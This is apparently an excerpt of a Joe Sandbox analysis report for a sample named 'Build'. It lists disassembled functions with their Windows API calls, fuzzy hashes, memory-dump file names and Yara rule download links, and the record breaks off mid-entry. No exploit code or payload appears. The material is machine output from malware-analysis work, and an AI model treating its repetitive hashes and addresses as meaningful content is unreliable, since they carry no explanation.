Opcode Fuzzy Hash: 87ca94288979e158308bddd33be1f9cdda771c050e80aa82dcf33d57c19ddd44
Instruction Fuzzy Hash: B921E1312492829BC716DF65C892ABBFBECAF65304F09891DF4C5C7141D329E94CDB62

Function 00361FB0 Relevance: 3.1, APIs: 2, Instructions: 69COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00361FB7
_wcslen.LIBCMT ref: 00362052

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: H_prolog3_wcslen
String ID:
API String ID: 3746244732-0
Opcode ID: dcf07e7d206534aa5ac3e4139ef51e276c1a3798df0c94c027daff80302aa833
Instruction ID: 73377bdcb07b51f1979e79e335a31dab35627c4c70fcb8029987c978561fa2ed
Opcode Fuzzy Hash: dcf07e7d206534aa5ac3e4139ef51e276c1a3798df0c94c027daff80302aa833
Instruction Fuzzy Hash: 41216A31900609EFCF22AF94C855AEEB7B6BF08300F15846DF445BB2A1CB395A51DB60

Function 00386192 Relevance: 3.1, APIs: 2, Instructions: 67libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,00000001,003C60C8,?,?,?,00386386,00000004,InitializeCriticalSectionEx,00399624,InitializeCriticalSectionEx,00000000,?,0038613D,003C60C8,00000FA0), ref: 00386215
GetProcAddress.KERNEL32(00000000,?), ref: 0038621F

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID:
API String ID: 3013587201-0
Opcode ID: c53886fa6d59ccf39422170ca7c26bb015de75a3c2950c93ee2f5e5305da6618
Instruction ID: f0d0a662efc58e36366a24133122967006f265e3565bebf676464d64ee741222
Opcode Fuzzy Hash: c53886fa6d59ccf39422170ca7c26bb015de75a3c2950c93ee2f5e5305da6618
Instruction Fuzzy Hash: A511D3316016159FCF23EFA4DC8289A77ADFB45360B1501E9E916DB211E730ED01CB91

Function 0036B8C0 Relevance: 3.1, APIs: 2, Instructions: 56COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 0036B907
GetLastError.KERNEL32 ref: 0036B914

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 98df7b58c1356a858c87590abde5bccebafb1d34ef5cc07a59bbaa598046b03f
Instruction ID: 12e61cd4177ddf2648a83a8bed4d2824a12855e5ab1bc8ef63fbb1d2d67f0cfb
Opcode Fuzzy Hash: 98df7b58c1356a858c87590abde5bccebafb1d34ef5cc07a59bbaa598046b03f
Instruction Fuzzy Hash: D411E130A10700ABE726D629C885BA6F3ECEB05370F608629E252D36D4D770ED85CB60

Function 0038BB34 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0038BB55

Part of subcall function 0038BC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00386A24,?,0000015D,?,?,?,?,00387F00,000000FF,00000000,?,?), ref: 0038BCC0

HeapReAlloc.KERNEL32(00000000,?,?,?,?,003A50C4,0036190A,?,?,00000007,?,?,?,00361476,?,00000000), ref: 0038BB91

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: ddb9b5a96b23764738c61ae9cb2e033a2882de0d983e3e777d9c01ce836e21e4
Instruction ID: 7380bad7bacc6127e63b226b3231c56b7855a261c6e4fef4d4c5175e619fb990
Opcode Fuzzy Hash: ddb9b5a96b23764738c61ae9cb2e033a2882de0d983e3e777d9c01ce836e21e4
Instruction Fuzzy Hash: 35F06231501717A7DB233A66AC01F6BFB6C9F82BB0F164196F8159A1A5DF21DC0183A9

Function 0036C2E5 Relevance: 3.0, APIs: 2, Instructions: 38COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,?,00000001,?,0036BF5E,?,?), ref: 0036C305

Part of subcall function 0036DA1E: _wcslen.LIBCMT ref: 0036DA59

SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0036BF5E,?,?), ref: 0036C334

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: 1810c5d0399c5d07e5f12ac61c3ded24d3ae50b057a15485cc1aa851c0429c8f
Instruction ID: 8938edccae522e5e808fd44bf23b6afe5e0ef723416e41534a5545a0c9fb65d3
Opcode Fuzzy Hash: 1810c5d0399c5d07e5f12ac61c3ded24d3ae50b057a15485cc1aa851c0429c8f
Instruction Fuzzy Hash: F1F09075601219ABDB02AF719C41AEF77ACEF09304F40C096B945D7250DA35DE45CB64

Function 0036BC65 Relevance: 3.0, APIs: 2, Instructions: 36fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,?,?,?,0036B14B,?,00000000,0036AF6E,92C77967,00000000,0039517A,000000FF,?,00368882,?,?), ref: 0036BC82

Part of subcall function 0036DA1E: _wcslen.LIBCMT ref: 0036DA59

DeleteFileW.KERNEL32(?,?,?,00000800,?,0036B14B,?,00000000,0036AF6E,92C77967,00000000,0039517A,000000FF,?,00368882,?), ref: 0036BCAE

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: DeleteFile$_wcslen
String ID:
API String ID: 2643169976-0
Opcode ID: f723ab41559aab83db9d936db38b695695acaeb652ea21b43f46b8a4b3ef4788
Instruction ID: b85339dfacba9fff56cc13e0c7273aec681c1a8bc517b05027d0afa4be91d476
Opcode Fuzzy Hash: f723ab41559aab83db9d936db38b695695acaeb652ea21b43f46b8a4b3ef4788
Instruction Fuzzy Hash: F8F0E9356012189BD702EF749C42EDE73AC9F0D300F404056FA01D7141DF71DE898B94

Function 0038030B Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00380341

Part of subcall function 00364C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00364C13

SetDlgItemTextW.USER32(00000065,?), ref: 00380358

Part of subcall function 0037D864: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0037D875
Part of subcall function 0037D864: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0037D886
Part of subcall function 0037D864: IsDialogMessageW.USER32(0001048A,?), ref: 0037D89A
Part of subcall function 0037D864: TranslateMessage.USER32(?), ref: 0037D8A8
Part of subcall function 0037D864: DispatchMessageW.USER32(?), ref: 0037D8B2

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
String ID:
API String ID: 2718869927-0
Opcode ID: 8e3194a6adf327b17e30cf3e90f7b95a4570c9a4c24c2d89a0679fed1bc86f50
Instruction ID: 5b71da34a2efc90e55534cd4c68e3643b0ef2bf5fbab926b18c72ec33d0ab1c4
Opcode Fuzzy Hash: 8e3194a6adf327b17e30cf3e90f7b95a4570c9a4c24c2d89a0679fed1bc86f50
Instruction Fuzzy Hash: D8F096715103086ACB13EB69DC06EDF7BAC9B0E304F044091B20597152D5349A018B61

Function 0036BCDD Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,?,0036BCD4,?,00368607,?), ref: 0036BCFA

Part of subcall function 0036DA1E: _wcslen.LIBCMT ref: 0036DA59

GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,?,?,0036BCD4,?,00368607,?), ref: 0036BD24

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: a4d35651fea564bc9ed6abfbaab112d5a28fc39866f8b499adb2bbef0034432a
Instruction ID: 7694721fc9d4e9b1c5b8eb2cf7897614433ecc4833693b13b0e3289f0d7bdc3b
Opcode Fuzzy Hash: a4d35651fea564bc9ed6abfbaab112d5a28fc39866f8b499adb2bbef0034432a
Instruction Fuzzy Hash: 85F0BE31A002185BC702FFB89D419EEB7BCAB4E760F0141A5FA41EB280DB709E818B94

Function 00373184 Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,00000002,00000002,?,003731C7,0036D526), ref: 00373191
GetProcessAffinityMask.KERNEL32(00000000,?,003731C7), ref: 00373198

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 8377d9c1ccf609d0079ce9f1f28cf14885cb026ab372f7f43fe8d33763cd3d40
Instruction ID: 92cc127caa5782c4a7d19598ca563e914391230dc0d36924472e9cb449eb3590
Opcode Fuzzy Hash: 8377d9c1ccf609d0079ce9f1f28cf14885cb026ab372f7f43fe8d33763cd3d40
Instruction Fuzzy Hash: 9EE0D872B10105679F1B97A49C468EB73DDDA44344711807AA507D3300F93DDE0556A0

Function 003728AB Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 003728D4
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00371309,Crypt32.dll,00000000,00371383,00000200,?,00371366,00000000,00000000,?), ref: 003728F4

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: ba3e293510f4d92132360e8be4a9c80aedb2027439b0516af4eb9f9371402a35
Instruction ID: 6b59d0a57b44e1fb4b7e83c0fffda9acecd89c5b0c978dbddf8e8c35b6600d0e
Opcode Fuzzy Hash: ba3e293510f4d92132360e8be4a9c80aedb2027439b0516af4eb9f9371402a35
Instruction Fuzzy Hash: BDF0E271A00208ABCB12EFA8DC49DDFB7FCEF4D701F0000AAB605D7100CA74EA898B64

Function 0037CD3F Relevance: 3.0, APIs: 2, Instructions: 31comCOMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,0039505D,000000FF), ref: 0037CD7D
OleUninitialize.OLE32(?,?,?,?,0039505D,000000FF), ref: 0037CD82

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: 6d2bd949ba20f88c41532d62be149f7bbeb53dc676dac6b578e9aa941d09c0e4
Instruction ID: 9b3fe520016d2a1ff2e978e94f52b54e2ee156f447cfe2647590ffbc8bfa9749
Opcode Fuzzy Hash: 6d2bd949ba20f88c41532d62be149f7bbeb53dc676dac6b578e9aa941d09c0e4
Instruction Fuzzy Hash: 07F05E76604A44AFC702DF19DC01F5AFBBCFB4AB20F00426AE816C37A0DB35A941CB94

Function 0037C34D Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0037C36E
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0037C375

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: 5b7d3bfc2719bd467750fa9be1af80b934f6e85d2f6b94ecd6e7ddc1d2c6a1d3
Instruction ID: 7b732425638d77d2030975da636ebcd37575aae318267528ac7d20ff383c2974
Opcode Fuzzy Hash: 5b7d3bfc2719bd467750fa9be1af80b934f6e85d2f6b94ecd6e7ddc1d2c6a1d3
Instruction Fuzzy Hash: B6E06DB5410208EBDB21EF95C840B99B7FCEB05310F10C05FE89A93200D274AE409F50

Function 003851AC Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 003851CA
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 003851D5

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptd
String ID:
API String ID: 1660781231-0
Opcode ID: cb1c0dfa6722c397ac1da3ea99bba6fdbb9074839b12f3d5008ef6cb29d55b74
Instruction ID: 50e4451103baff1c8f7a5aeadd233926b60d5c135388588ce5de9595a3618394
Opcode Fuzzy Hash: cb1c0dfa6722c397ac1da3ea99bba6fdbb9074839b12f3d5008ef6cb29d55b74
Instruction Fuzzy Hash: 79D02228948F0048CC1336B43C0BBAB2B589A027F17F01BCAE421CE9D2EE528C406711

Function 00361341 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00361356
ShowWindow.USER32(00000000), ref: 0036135D

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: 890d7d6f1998e756ec035ad43e59d0fa8ef8f7cfee99903cf1ec2c84643bd8b1
Instruction ID: f7ea1c0a4f65806db6967124f7b24cc853627f4f1cc6610f9c065c795a4fb8cd
Opcode Fuzzy Hash: 890d7d6f1998e756ec035ad43e59d0fa8ef8f7cfee99903cf1ec2c84643bd8b1
Instruction Fuzzy Hash: B8C0123205C600BECB020BB0DC09C2ABBACABA4312F19CA08F8B6C1060C239C010DF11

Function 00361B63 Relevance: 1.8, APIs: 1, Instructions: 311COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00361B6A

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: 6041ad606e6c3622fd193d325334278b4e898675857eac4269e48483afb0ec2c
Instruction ID: ce43af1a7ec79881008a8f067179bcfaa924e1a9472806237b2f06245a1b99e5
Opcode Fuzzy Hash: 6041ad606e6c3622fd193d325334278b4e898675857eac4269e48483afb0ec2c
Instruction Fuzzy Hash: 92C1A270A042509FDF26CF28C4847AD7BB5AF46310F1D85B9EC469F29ACB35DA44CBA1

Function 0036147C Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00361483

Part of subcall function 00366AE8: __EH_prolog3.LIBCMT ref: 00366AEF

Part of subcall function 0036EE0F: __EH_prolog3.LIBCMT ref: 0036EE16

Part of subcall function 0036668F: __EH_prolog3.LIBCMT ref: 00366696

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: 6b28d470a95391ce2d1f40f63b170327547294c65cd90fd700d847b7bfb050db
Instruction ID: fa96a54626fd693c8d865af328ccc278eb64b15e5992d016250d85a788ae6421
Opcode Fuzzy Hash: 6b28d470a95391ce2d1f40f63b170327547294c65cd90fd700d847b7bfb050db
Instruction Fuzzy Hash: 8E4136B0A063808ECB15DF6994812D9BBE6AF59300F0C41BEEC5ECF29BD7755215CB62

Function 00375617 Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0037561E

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
